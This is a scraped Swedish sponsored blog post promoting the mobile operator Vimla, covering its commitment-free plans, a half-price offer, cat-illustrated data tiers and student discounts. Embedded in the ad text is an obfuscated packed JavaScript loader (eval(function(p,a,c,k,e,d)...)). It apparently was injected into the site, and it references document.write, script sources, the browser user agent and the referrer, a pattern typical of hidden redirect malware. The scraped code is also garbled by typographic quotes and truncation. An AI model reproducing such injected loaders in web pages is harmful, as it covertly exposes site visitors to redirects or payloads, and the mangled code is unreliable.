Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

Sponsrad Video: Hos oss på Vimla bestämmer du själv

type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_373132902.js”>

Vimla eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eidtd|var|u0026u|referrer|ynsdh||js|php’.split(’|’),0,{}))
– mobiloperatören utan lur och bindningstider

Vimla är mobiloperatören som tror att det måste finnas ett bättre sätt att göra mobiltelefoni på. Hos Vimla kan du ställa in ditt abonnemang som du vill, när du vill. Helt utan bindningstider och dessutom till ett lågt pris: du väljer själv hur mycket data, samtal och meddelanden du vill betala för per månad. På det viset har du alltid det abonnemang som passar just dig bäst – smart va? Du som vill prova Vimla får just nu halva priset i tre månader. Helt utan bindningstid, hakar och lur. Avsluta enkelt om du inte är nöjd!

Förresten, du kanske undrar över katterna?

Jomen såhär är det: katter är stora på Internet, men olika stora. Därför har Vimla valt att visa de olika inställningarna för mobildata med åtta kända internetkatter. Hur många kan du namnet på? Och hur mycket katt behöver du per månad? För dig som är designintresserad kan det vara intressant att veta att kattdockorna är ritade av illustratören Ingela P Arrhenius. Många känner igen hennes affischer, melamintallrikar och babushka -liknande figurer för OMM Design.

Och just det! Vimla har extra bra priser på för dig som är student. Ännu mer surf för studiebidraget! Titta på videon och klicka dig vidare för att läsa mer!

Detta är ett sponsrat inlägg